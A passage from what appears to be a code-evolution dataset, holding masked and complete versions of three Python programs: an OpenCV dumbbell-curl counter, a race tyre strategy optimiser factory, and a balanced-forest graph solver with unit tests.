cv2.FONT_HERSHEY_PLAIN,\n 4, (255, 0, 0), 4)\n\n\ndef main():\n cap = cv2.VideoCapture('media/1.mp4')\n estimator = PoseEstimator()\n while True:\n _, img = cap.read()\n img = cv2.resize(img, (720, 1280))\n img = estimator.findPose(img)\n lms = estimator.findPosition(img, draw=False)\n if len(lms) > 28:\n estimator.countReps(img, 11, 13, 15)\n cv2.imshow('Correct Pose Estimation', img)\n if cv2.waitKey(1) & 255 == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n break\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# Counts number of dumbbell curls in the video \n\nimport cv2 \nimport mediapipe as mp \nimport base\nimport math\nimport numpy as np\n\nclass PoseEstimator(base.PoseDetector): \n def __init__(self, mode=False, upperBody = False, smooth=True, detectConf=.5, trackConf=.5, \n outFile=\"output.mp4\", outWidth=720, outHeight=1280):\n super().__init__(mode, upperBody, smooth, detectConf, trackConf, outFile, outWidth, outHeight)\n self.count = 0\n self.dir = 0\n\n def findAngle(self, img, p1, p2, p3, draw=True): \n x1,y1 = self.lms[p1][1:]\n x2,y2 = self.lms[p2][1:]\n x3,y3 = self.lms[p3][1:]\n\n angle = math.degrees(math.atan2(y3-y2,x3-x2) - math.atan2(y1-y2,x1-x2))\n if angle<0: \n angle += 360\n\n if draw: \n cv2.line(img, (x1,y1), (x2,y2), (255,255,255) ,2)\n cv2.line(img, (x3,y3), (x2,y2), (255,255,255) ,2)\n cv2.circle(img, (x1,y1), 8, (0,0,255), cv2.FILLED)\n cv2.circle(img, (x1,y1), 12, (0,0,255), 2)\n cv2.circle(img, (x2,y2), 8, (0,0,255), cv2.FILLED)\n cv2.circle(img, (x2,y2), 12, (0,0,255), 2)\n cv2.circle(img, (x3,y3), 8, (0,0,255), cv2.FILLED)\n cv2.circle(img, (x3,y3), 12, (0,0,255), 2)\n cv2.putText(img, str(int(angle)), (x2-40,y2+50), cv2.FONT_HERSHEY_PLAIN, 2, (255,0,255), 2)\n\n return angle \n \n def countReps(self, img, p1, p2, p3): \n angle = self.findAngle(img, p1, p2, p3) \n perc = np.interp(angle, (210,320), (0,100))\n \n color = (0,255,0)\n if perc > 95: \n color = (0,0,255)\n if self.dir == 0: \n self.count += .5 \n self.dir = 1\n if perc == 0: \n color = (255,0,0)\n if self.dir == 1: \n self.count += .5\n self.dir = 0 \n \n cv2.putText(img, f'{int(self.count)}', (30,120), cv2.FONT_HERSHEY_PLAIN, 9, (255,0,0), 4)\n\n bar = np.interp(perc, (0,100), (800,200))\n cv2.rectangle(img, (50,200), (100,800), color, 3)\n cv2.rectangle(img, (50,int(bar)), (100,800), color, cv2.FILLED)\n cv2.putText(img, f'{int(perc)}%', (30,870), cv2.FONT_HERSHEY_PLAIN, 4, (255,0,0), 4)\n\n\ndef main():\n cap = cv2.VideoCapture(\"media/1.mp4\") \n estimator = PoseEstimator()\n\n while True: \n _, img = cap.read()\n img = cv2.resize(img, (720, 1280))\n\n img = estimator.findPose(img) \n lms = estimator.findPosition(img, draw=False) \n if len(lms)>28: \n estimator.countReps(img,11,13,15)\n\n # estimator.writeFrame(img)\n\n cv2.imshow(\"Correct Pose Estimation\", img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n break\n\nif __name__ == \"__main__\": \n main() ",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class CalulateStrategyWith:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CalulateStrategyWith:
<|reserved_special_token_0|>
@staticmethod
def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):
"""
Use genetic evolution to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
generations (int): Evolution generation limit
Returns:
Car
"""
return StrategyDeap(car, include_initial_tyre, generations).run()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CalulateStrategyWith:
@staticmethod
def Annealing(car, include_initial_tyre=False, iterations=100000):
"""
Use simulated annealing to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
iterations (int): Iteration limit
Returns:
Car
"""
sim = StrategyAnnealer(car)
sim.setIncludeInitialTyreInMove(include_initial_tyre)
sim.steps = iterations
state, e = sim.anneal()
return state
@staticmethod
def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):
"""
Use genetic evolution to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
generations (int): Evolution generation limit
Returns:
Car
"""
return StrategyDeap(car, include_initial_tyre, generations).run()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from .strategy_annealer import StrategyAnnealer
from .strategy_deap import StrategyDeap
class CalulateStrategyWith:
@staticmethod
def Annealing(car, include_initial_tyre=False, iterations=100000):
"""
Use simulated annealing to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
iterations (int): Iteration limit
Returns:
Car
"""
sim = StrategyAnnealer(car)
sim.setIncludeInitialTyreInMove(include_initial_tyre)
sim.steps = iterations
state, e = sim.anneal()
return state
@staticmethod
def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):
"""
Use genetic evolution to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
generations (int): Evolution generation limit
Returns:
Car
"""
return StrategyDeap(car, include_initial_tyre, generations).run()
<|reserved_special_token_1|>
'''
Factory for creating and running ssimulations against optimization tools
Author:
Matthew Barber <[email protected]>
'''
from .strategy_annealer import StrategyAnnealer
from .strategy_deap import StrategyDeap
class CalulateStrategyWith:
@staticmethod
def Annealing(car, include_initial_tyre=False, iterations=100000):
'''
Use simulated annealing to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
iterations (int): Iteration limit
Returns:
Car
'''
sim = StrategyAnnealer(car)
sim.setIncludeInitialTyreInMove(include_initial_tyre)
sim.steps = iterations
state, e = sim.anneal()
return state
@staticmethod
def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):
'''
Use genetic evolution to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
generations (int): Evolution generation limit
Returns:
Car
'''
return StrategyDeap(car, include_initial_tyre, generations).run()
|
flexible
|
{
"blob_id": "1cab38721e6b96a9877bd67cbddaa4d6b4e53d1b",
"index": 8175,
"step-1": "<mask token>\n\n\nclass CalulateStrategyWith:\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass CalulateStrategyWith:\n <mask token>\n\n @staticmethod\n def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):\n \"\"\"\n Use genetic evolution to determine the best strategy\n\n Args:\n car (Car): An initial car to test with\n include_initial_tyre (bool): Include the initial tyre in moves\n generations (int): Evolution generation limit\n\n Returns:\n Car\n \"\"\"\n return StrategyDeap(car, include_initial_tyre, generations).run()\n",
"step-3": "<mask token>\n\n\nclass CalulateStrategyWith:\n\n @staticmethod\n def Annealing(car, include_initial_tyre=False, iterations=100000):\n \"\"\"\n Use simulated annealing to determine the best strategy\n\n Args:\n car (Car): An initial car to test with\n include_initial_tyre (bool): Include the initial tyre in moves\n iterations (int): Iteration limit\n\n Returns:\n Car\n \"\"\"\n sim = StrategyAnnealer(car)\n sim.setIncludeInitialTyreInMove(include_initial_tyre)\n sim.steps = iterations\n state, e = sim.anneal()\n return state\n\n @staticmethod\n def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):\n \"\"\"\n Use genetic evolution to determine the best strategy\n\n Args:\n car (Car): An initial car to test with\n include_initial_tyre (bool): Include the initial tyre in moves\n generations (int): Evolution generation limit\n\n Returns:\n Car\n \"\"\"\n return StrategyDeap(car, include_initial_tyre, generations).run()\n",
"step-4": "<mask token>\nfrom .strategy_annealer import StrategyAnnealer\nfrom .strategy_deap import StrategyDeap\n\n\nclass CalulateStrategyWith:\n\n @staticmethod\n def Annealing(car, include_initial_tyre=False, iterations=100000):\n \"\"\"\n Use simulated annealing to determine the best strategy\n\n Args:\n car (Car): An initial car to test with\n include_initial_tyre (bool): Include the initial tyre in moves\n iterations (int): Iteration limit\n\n Returns:\n Car\n \"\"\"\n sim = StrategyAnnealer(car)\n sim.setIncludeInitialTyreInMove(include_initial_tyre)\n sim.steps = iterations\n state, e = sim.anneal()\n return state\n\n @staticmethod\n def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):\n \"\"\"\n Use genetic evolution to determine the best strategy\n\n Args:\n car (Car): An initial car to test with\n include_initial_tyre (bool): Include the initial tyre in moves\n generations (int): Evolution generation limit\n\n Returns:\n Car\n \"\"\"\n return StrategyDeap(car, include_initial_tyre, generations).run()\n",
"step-5": "'''\n Factory for creating and running ssimulations against optimization tools\n\n Author:\n Matthew Barber <[email protected]>\n'''\nfrom .strategy_annealer import StrategyAnnealer\nfrom .strategy_deap import StrategyDeap\n\n\nclass CalulateStrategyWith:\n @staticmethod\n def Annealing(car, include_initial_tyre=False, iterations=100000):\n '''\n Use simulated annealing to determine the best strategy\n\n Args:\n car (Car): An initial car to test with\n include_initial_tyre (bool): Include the initial tyre in moves\n iterations (int): Iteration limit\n\n Returns:\n Car\n '''\n sim = StrategyAnnealer(car)\n sim.setIncludeInitialTyreInMove(include_initial_tyre)\n sim.steps = iterations\n state, e = sim.anneal()\n return state\n\n @staticmethod\n def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):\n '''\n Use genetic evolution to determine the best strategy\n\n Args:\n car (Car): An initial car to test with\n include_initial_tyre (bool): Include the initial tyre in moves\n generations (int): Evolution generation limit\n\n Returns:\n Car\n '''\n return StrategyDeap(car, include_initial_tyre, generations).run()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
skipped = 0
class Node(object):
"""docstring for Node"""
def __init__(self, value, indentifier):
super(Node, self).__init__()
self.value = value
self.identifier = indentifier
self.next = None
class Graph(object):
"""docstring for Graph"""
def __init__(self, values, edges):
super(Graph, self).__init__()
self.node_values = values
self.vertices = len(values)
self.edges = edges
self.graph = [None] * self.vertices
# self.edges.sort()
self.grand_sum = sum(self.node_values)
def build_adjacency_list(self):
for edge in self.edges:
fro = edge[0] - 1
to = edge[1]- 1
# Adding the node to the source node
node = Node(self.node_values[to], to)
node.next = self.graph[fro]
self.graph[fro] = node
# Adding the source node to the destination as
# it is the undirected graph
node = Node(self.node_values[fro], fro)
node.next = self.graph[to]
self.graph[to] = node
def print_graph(self):
for i in range(self.vertices):
node = self.graph[i]
print("Vertex:", i)
while(node!=None):
print(node.value, node.identifier)
node = node.next
print("<<"*20)
def get_tree_nodes(self, start_node, nodes, edge, total):
if(start_node==None):
return nodes
while(start_node!=None):
if(start_node.identifier==edge[0] or start_node.identifier==edge[2] or (start_node.identifier in nodes)):
print("skipping ", start_node.identifier)
else:
print("adding ", start_node.identifier)
nodes.append(start_node.identifier)
total[0] += start_node.value
next_n = self.graph[start_node.identifier]
self.get_tree_nodes(next_n, nodes, edge, total)
start_node = start_node.next
return nodes
def split_and_compute_tree_sum(self, t1_nodes = [], t2_nodes = [], edge=[], ton = False):
t1_total = 0
t2_total = 0
total = [0]
start_node = self.graph[edge[1]]
if(start_node.next != None):
t2_nodes = self.get_tree_nodes(start_node, t2_nodes, edge, total)
if(len(t2_nodes)==0 and edge[1]!=edge[2]):
t2_nodes.append(edge[1])
total[0] += self.node_values[edge[1]]
t2_total = total[0]
if(not ton and t2_total < self.grand_sum/2):
for i in range(self.vertices):
if(i not in t2_nodes):
t1_nodes.append(i)
t1_total = self.grand_sum - t2_total
print("t2_nodes", t2_nodes)
print("t2_total", t2_total)
return t1_total, t2_total
def check(self, tree1_total, tree2_total, tree3_total):
print("###"*10)
print("FINAL tree1_total: ", tree1_total)
print("FINAL tree2_total: ", tree2_total)
print("FINAL tree3_total: ", tree3_total)
print("###"*10)
if (tree1_total == tree2_total) or (tree1_total == tree3_total) or (tree2_total == tree3_total):
mx = max(tree1_total, tree2_total, tree3_total)
if([tree1_total, tree2_total, tree3_total].count(mx) >= 2):
ret = mx - min(tree1_total, tree2_total, tree3_total)
return ret, True
return -1, False
def split_tree_into_two(self):
ret = -1
found = False
global skipped
for entry in range(self.vertices):
tree1_nodes = []
tree2_nodes = []
tree3_nodes = []
temp_nodes = []
n = self.graph[entry]
while(n!=None):
edge = [entry, n.identifier, -1]
if(n.identifier <= entry):
n = n.next
skipped += 1
continue
print("##MAIN##. SPLIT POINT EDGE: ", edge)
tree1_nodes = []
tree2_nodes = []
tree1_total, tree2_total = self.split_and_compute_tree_sum(tree1_nodes, tree2_nodes, edge)
print("ORIGINALS: ", tree1_total, tree2_total)
if(min(tree1_total, tree2_total) < self.grand_sum/3 or (max(tree1_total, tree2_total) > (2*self.grand_sum)/3)):
n = n.next
continue
if(tree1_total > tree2_total):
ret, found = self.find_third_tree(tree1_total, tree2_total,tree1_nodes, 1, edge[1])
elif(tree2_total > tree1_total):
ret, found = self.find_third_tree(tree1_total, tree2_total,tree2_nodes, 2, edge[0])
elif (tree1_total == tree2_total):
ret = tree1_total
found = True
else:
found = True
if(found):
break
n = n.next
if(found):
break
return ret
def find_third_tree(self, tree1_total, tree2_total, nodes, t = 1, m=0):
ret , found = -1, False
global skipped
consumed = []
for i in range(len(nodes)):
skip_n = nodes[i]
consumed.append(skip_n)
n = self.graph[skip_n]
while(n!=None):
if(n.identifier in consumed):
n = n.next
skipped += 1
continue
edge = [skip_n, n.identifier, m]
print("2. SPLIT POINT EDGE: ", edge)
print("tree1_total",tree1_total)
tree3_nodes = []
temp_nodes = []
_,tree3_total = self.split_and_compute_tree_sum(temp_nodes, tree3_nodes, edge, True)
if(t==1):
ret , found = self.check(tree1_total - tree3_total, tree2_total, tree3_total)
elif(t==2):
ret , found = self.check(tree1_total, tree2_total - tree3_total, tree3_total)
if(found):
break
n = n.next
if(found):
break
return ret, found
def balancedForest(values, edges):
mygraph = Graph(values, edges)
mygraph.build_adjacency_list()
mygraph.print_graph()
return mygraph.split_tree_into_two()
import unittest
class BalancedForestTest(unittest.TestCase):
def test1(self):
expected = 10
c = [1, 1, 1, 18, 10, 11, 5, 6]
edges = [[1, 2], [1, 4], [2, 3], [1, 8], [8, 7], [7, 6], [5, 7]]
self.assertEqual(balancedForest(c, edges), expected)
def test2(self):
expected = 13
c = [12, 7, 11, 17, 20, 10]
edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]
self.assertEqual(balancedForest(c, edges), expected)
def test3(self):
expected = 19
c = [15, 12, 8, 14, 13]
edges = [[4,5],[1,2],[1,3],[1,4]]
self.assertEqual(balancedForest(c, edges), expected)
def test4(self):
expected = 2
c = [1,2,2,1,1]
edges = [[1,2],[1,3],[3,5],[1,4]]
self.assertEqual(balancedForest(c, edges), expected)
def test5(self):
expected = -1
c = [1,3,5]
edges = [[1,3],[1,2]]
self.assertEqual(balancedForest(c, edges), expected)
def test6(self):
expected = -1
c = [7, 7, 4, 1, 1, 1]
edges = [(1, 2), (3, 1), (2, 4), (2, 5), (2, 6)]
self.assertEqual(balancedForest(c, edges), expected)
def test7(self):
expected = 0
c = [1, 3, 4, 4]
edges = [(1, 2), (1, 3), (1, 4)]
self.assertEqual(balancedForest(c, edges), expected)
def test8(self):
expected = 297
c = [100, 99, 98, 100, 99, 98]
edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]
self.assertEqual(balancedForest(c, edges), expected)
def test9(self):
expected = 4
c = [12, 10, 8, 12, 14, 12]
edges = [[1, 2], [1, 3], [1, 4], [2, 5], [4, 6]]
self.assertEqual(balancedForest(c, edges), expected)
print("SKIPPED", skipped)
if __name__ == '__main__':
unittest.main()
|
normal
|
{
"blob_id": "e361215c44305f1ecc1cbe9e19345ee08bdd30f5",
"index": 2393,
"step-1": "<mask token>\n\n\nclass BalancedForestTest(unittest.TestCase):\n\n def test1(self):\n expected = 10\n c = [1, 1, 1, 18, 10, 11, 5, 6]\n edges = [[1, 2], [1, 4], [2, 3], [1, 8], [8, 7], [7, 6], [5, 7]]\n self.assertEqual(balancedForest(c, edges), expected)\n <mask token>\n\n def test3(self):\n expected = 19\n c = [15, 12, 8, 14, 13]\n edges = [[4, 5], [1, 2], [1, 3], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n <mask token>\n\n def test5(self):\n expected = -1\n c = [1, 3, 5]\n edges = [[1, 3], [1, 2]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test6(self):\n expected = -1\n c = [7, 7, 4, 1, 1, 1]\n edges = [(1, 2), (3, 1), (2, 4), (2, 5), (2, 6)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test7(self):\n expected = 0\n c = [1, 3, 4, 4]\n edges = [(1, 2), (1, 3), (1, 4)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test8(self):\n expected = 297\n c = [100, 99, 98, 100, 99, 98]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Node(object):\n <mask token>\n\n def __init__(self, value, indentifier):\n super(Node, self).__init__()\n self.value = value\n self.identifier = indentifier\n self.next = None\n\n\nclass Graph(object):\n \"\"\"docstring for Graph\"\"\"\n\n def __init__(self, values, edges):\n super(Graph, self).__init__()\n self.node_values = values\n self.vertices = len(values)\n self.edges = edges\n self.graph = [None] * self.vertices\n self.grand_sum = sum(self.node_values)\n\n def build_adjacency_list(self):\n for edge in self.edges:\n fro = edge[0] - 1\n to = edge[1] - 1\n node = Node(self.node_values[to], to)\n node.next = self.graph[fro]\n self.graph[fro] = node\n node = Node(self.node_values[fro], fro)\n node.next = self.graph[to]\n self.graph[to] = node\n\n def print_graph(self):\n for i in range(self.vertices):\n node = self.graph[i]\n print('Vertex:', i)\n while node != None:\n print(node.value, node.identifier)\n node = node.next\n print('<<' * 20)\n\n def get_tree_nodes(self, start_node, nodes, edge, total):\n if start_node == None:\n return nodes\n while start_node != None:\n if start_node.identifier == edge[0\n ] or start_node.identifier == edge[2\n ] or start_node.identifier in nodes:\n print('skipping ', start_node.identifier)\n else:\n print('adding ', start_node.identifier)\n nodes.append(start_node.identifier)\n total[0] += start_node.value\n next_n = self.graph[start_node.identifier]\n self.get_tree_nodes(next_n, nodes, edge, total)\n start_node = start_node.next\n return nodes\n\n def split_and_compute_tree_sum(self, t1_nodes=[], t2_nodes=[], edge=[],\n ton=False):\n t1_total = 0\n t2_total = 0\n total = [0]\n start_node = self.graph[edge[1]]\n if start_node.next != None:\n t2_nodes = self.get_tree_nodes(start_node, t2_nodes, edge, total)\n if len(t2_nodes) == 0 and edge[1] != edge[2]:\n t2_nodes.append(edge[1])\n total[0] += self.node_values[edge[1]]\n t2_total = total[0]\n if not ton and t2_total < self.grand_sum / 2:\n for i in range(self.vertices):\n if i not in t2_nodes:\n t1_nodes.append(i)\n t1_total = self.grand_sum - t2_total\n print('t2_nodes', t2_nodes)\n print('t2_total', t2_total)\n return t1_total, t2_total\n\n def check(self, tree1_total, tree2_total, tree3_total):\n print('###' * 10)\n print('FINAL tree1_total: ', tree1_total)\n print('FINAL tree2_total: ', tree2_total)\n print('FINAL tree3_total: ', tree3_total)\n print('###' * 10)\n if (tree1_total == tree2_total or tree1_total == tree3_total or \n tree2_total == tree3_total):\n mx = max(tree1_total, tree2_total, tree3_total)\n if [tree1_total, tree2_total, tree3_total].count(mx) >= 2:\n ret = mx - min(tree1_total, tree2_total, tree3_total)\n return ret, True\n return -1, False\n\n def split_tree_into_two(self):\n ret = -1\n found = False\n global skipped\n for entry in range(self.vertices):\n tree1_nodes = []\n tree2_nodes = []\n tree3_nodes = []\n temp_nodes = []\n n = self.graph[entry]\n while n != None:\n edge = [entry, n.identifier, -1]\n if n.identifier <= entry:\n n = n.next\n skipped += 1\n continue\n print('##MAIN##. SPLIT POINT EDGE: ', edge)\n tree1_nodes = []\n tree2_nodes = []\n tree1_total, tree2_total = self.split_and_compute_tree_sum(\n tree1_nodes, tree2_nodes, edge)\n print('ORIGINALS: ', tree1_total, tree2_total)\n if min(tree1_total, tree2_total) < self.grand_sum / 3 or max(\n tree1_total, tree2_total) > 2 * self.grand_sum / 3:\n n = n.next\n continue\n if tree1_total > tree2_total:\n ret, found = self.find_third_tree(tree1_total,\n tree2_total, tree1_nodes, 1, edge[1])\n elif tree2_total > tree1_total:\n ret, found = self.find_third_tree(tree1_total,\n tree2_total, tree2_nodes, 2, edge[0])\n elif tree1_total == tree2_total:\n ret = tree1_total\n found = True\n else:\n found = True\n if found:\n break\n n = n.next\n if found:\n break\n return ret\n\n def find_third_tree(self, tree1_total, tree2_total, nodes, t=1, m=0):\n ret, found = -1, False\n global skipped\n consumed = []\n for i in range(len(nodes)):\n skip_n = nodes[i]\n consumed.append(skip_n)\n n = self.graph[skip_n]\n while n != None:\n if n.identifier in consumed:\n n = n.next\n skipped += 1\n continue\n edge = [skip_n, n.identifier, m]\n print('2. SPLIT POINT EDGE: ', edge)\n print('tree1_total', tree1_total)\n tree3_nodes = []\n temp_nodes = []\n _, tree3_total = self.split_and_compute_tree_sum(temp_nodes,\n tree3_nodes, edge, True)\n if t == 1:\n ret, found = self.check(tree1_total - tree3_total,\n tree2_total, tree3_total)\n elif t == 2:\n ret, found = self.check(tree1_total, tree2_total -\n tree3_total, tree3_total)\n if found:\n break\n n = n.next\n if found:\n break\n return ret, found\n\n\n<mask token>\n\n\nclass BalancedForestTest(unittest.TestCase):\n\n def test1(self):\n expected = 10\n c = [1, 1, 1, 18, 10, 11, 5, 6]\n edges = [[1, 2], [1, 4], [2, 3], [1, 8], [8, 7], [7, 6], [5, 7]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test2(self):\n expected = 13\n c = [12, 7, 11, 17, 20, 10]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test3(self):\n expected = 19\n c = [15, 12, 8, 14, 13]\n edges = [[4, 5], [1, 2], [1, 3], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test4(self):\n expected = 2\n c = [1, 2, 2, 1, 1]\n edges = [[1, 2], [1, 3], [3, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test5(self):\n expected = -1\n c = [1, 3, 5]\n edges = [[1, 3], [1, 2]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test6(self):\n expected = -1\n c = [7, 7, 4, 1, 1, 1]\n edges = [(1, 2), (3, 1), (2, 4), (2, 5), (2, 6)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test7(self):\n expected = 0\n c = [1, 3, 4, 4]\n edges = [(1, 2), (1, 3), (1, 4)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test8(self):\n expected = 297\n c = [100, 99, 98, 100, 99, 98]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test9(self):\n expected = 4\n c = [12, 10, 8, 12, 14, 12]\n edges = [[1, 2], [1, 3], [1, 4], [2, 5], [4, 6]]\n self.assertEqual(balancedForest(c, edges), expected)\n print('SKIPPED', skipped)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Node(object):\n \"\"\"docstring for Node\"\"\"\n\n def __init__(self, value, indentifier):\n super(Node, self).__init__()\n self.value = value\n self.identifier = indentifier\n self.next = None\n\n\nclass Graph(object):\n \"\"\"docstring for Graph\"\"\"\n\n def __init__(self, values, edges):\n super(Graph, self).__init__()\n self.node_values = values\n self.vertices = len(values)\n self.edges = edges\n self.graph = [None] * self.vertices\n self.grand_sum = sum(self.node_values)\n\n def build_adjacency_list(self):\n for edge in self.edges:\n fro = edge[0] - 1\n to = edge[1] - 1\n node = Node(self.node_values[to], to)\n node.next = self.graph[fro]\n self.graph[fro] = node\n node = Node(self.node_values[fro], fro)\n node.next = self.graph[to]\n self.graph[to] = node\n\n def print_graph(self):\n for i in range(self.vertices):\n node = self.graph[i]\n print('Vertex:', i)\n while node != None:\n print(node.value, node.identifier)\n node = node.next\n print('<<' * 20)\n\n def get_tree_nodes(self, start_node, nodes, edge, total):\n if start_node == None:\n return nodes\n while start_node != None:\n if start_node.identifier == edge[0\n ] or start_node.identifier == edge[2\n ] or start_node.identifier in nodes:\n print('skipping ', start_node.identifier)\n else:\n print('adding ', start_node.identifier)\n nodes.append(start_node.identifier)\n total[0] += start_node.value\n next_n = self.graph[start_node.identifier]\n self.get_tree_nodes(next_n, nodes, edge, total)\n start_node = start_node.next\n return nodes\n\n def split_and_compute_tree_sum(self, t1_nodes=[], t2_nodes=[], edge=[],\n ton=False):\n t1_total = 0\n t2_total = 0\n total = [0]\n start_node = self.graph[edge[1]]\n if start_node.next != None:\n t2_nodes = self.get_tree_nodes(start_node, t2_nodes, edge, total)\n if len(t2_nodes) == 0 and edge[1] != edge[2]:\n t2_nodes.append(edge[1])\n total[0] += self.node_values[edge[1]]\n t2_total = total[0]\n if not ton and t2_total < self.grand_sum / 2:\n for i in range(self.vertices):\n if i not in t2_nodes:\n t1_nodes.append(i)\n t1_total = self.grand_sum - t2_total\n print('t2_nodes', t2_nodes)\n print('t2_total', t2_total)\n return t1_total, t2_total\n\n def check(self, tree1_total, tree2_total, tree3_total):\n print('###' * 10)\n print('FINAL tree1_total: ', tree1_total)\n print('FINAL tree2_total: ', tree2_total)\n print('FINAL tree3_total: ', tree3_total)\n print('###' * 10)\n if (tree1_total == tree2_total or tree1_total == tree3_total or \n tree2_total == tree3_total):\n mx = max(tree1_total, tree2_total, tree3_total)\n if [tree1_total, tree2_total, tree3_total].count(mx) >= 2:\n ret = mx - min(tree1_total, tree2_total, tree3_total)\n return ret, True\n return -1, False\n\n def split_tree_into_two(self):\n ret = -1\n found = False\n global skipped\n for entry in range(self.vertices):\n tree1_nodes = []\n tree2_nodes = []\n tree3_nodes = []\n temp_nodes = []\n n = self.graph[entry]\n while n != None:\n edge = [entry, n.identifier, -1]\n if n.identifier <= entry:\n n = n.next\n skipped += 1\n continue\n print('##MAIN##. SPLIT POINT EDGE: ', edge)\n tree1_nodes = []\n tree2_nodes = []\n tree1_total, tree2_total = self.split_and_compute_tree_sum(\n tree1_nodes, tree2_nodes, edge)\n print('ORIGINALS: ', tree1_total, tree2_total)\n if min(tree1_total, tree2_total) < self.grand_sum / 3 or max(\n tree1_total, tree2_total) > 2 * self.grand_sum / 3:\n n = n.next\n continue\n if tree1_total > tree2_total:\n ret, found = self.find_third_tree(tree1_total,\n tree2_total, tree1_nodes, 1, edge[1])\n elif tree2_total > tree1_total:\n ret, found = self.find_third_tree(tree1_total,\n tree2_total, tree2_nodes, 2, edge[0])\n elif tree1_total == tree2_total:\n ret = tree1_total\n found = True\n else:\n found = True\n if found:\n break\n n = n.next\n if found:\n break\n return ret\n\n def find_third_tree(self, tree1_total, tree2_total, nodes, t=1, m=0):\n ret, found = -1, False\n global skipped\n consumed = []\n for i in range(len(nodes)):\n skip_n = nodes[i]\n consumed.append(skip_n)\n n = self.graph[skip_n]\n while n != None:\n if n.identifier in consumed:\n n = n.next\n skipped += 1\n continue\n edge = [skip_n, n.identifier, m]\n print('2. SPLIT POINT EDGE: ', edge)\n print('tree1_total', tree1_total)\n tree3_nodes = []\n temp_nodes = []\n _, tree3_total = self.split_and_compute_tree_sum(temp_nodes,\n tree3_nodes, edge, True)\n if t == 1:\n ret, found = self.check(tree1_total - tree3_total,\n tree2_total, tree3_total)\n elif t == 2:\n ret, found = self.check(tree1_total, tree2_total -\n tree3_total, tree3_total)\n if found:\n break\n n = n.next\n if found:\n break\n return ret, found\n\n\ndef balancedForest(values, edges):\n mygraph = Graph(values, edges)\n mygraph.build_adjacency_list()\n mygraph.print_graph()\n return mygraph.split_tree_into_two()\n\n\n<mask token>\n\n\nclass BalancedForestTest(unittest.TestCase):\n\n def test1(self):\n expected = 10\n c = [1, 1, 1, 18, 10, 11, 5, 6]\n edges = [[1, 2], [1, 4], [2, 3], [1, 8], [8, 7], [7, 6], [5, 7]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test2(self):\n expected = 13\n c = [12, 7, 11, 17, 20, 10]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test3(self):\n expected = 19\n c = [15, 12, 8, 14, 13]\n edges = [[4, 5], [1, 2], [1, 3], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test4(self):\n expected = 2\n c = [1, 2, 2, 1, 1]\n edges = [[1, 2], [1, 3], [3, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test5(self):\n expected = -1\n c = [1, 3, 5]\n edges = [[1, 3], [1, 2]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test6(self):\n expected = -1\n c = [7, 7, 4, 1, 1, 1]\n edges = [(1, 2), (3, 1), (2, 4), (2, 5), (2, 6)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test7(self):\n expected = 0\n c = [1, 3, 4, 4]\n edges = [(1, 2), (1, 3), (1, 4)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test8(self):\n expected = 297\n c = [100, 99, 98, 100, 99, 98]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test9(self):\n expected = 4\n c = [12, 10, 8, 12, 14, 12]\n edges = [[1, 2], [1, 3], [1, 4], [2, 5], [4, 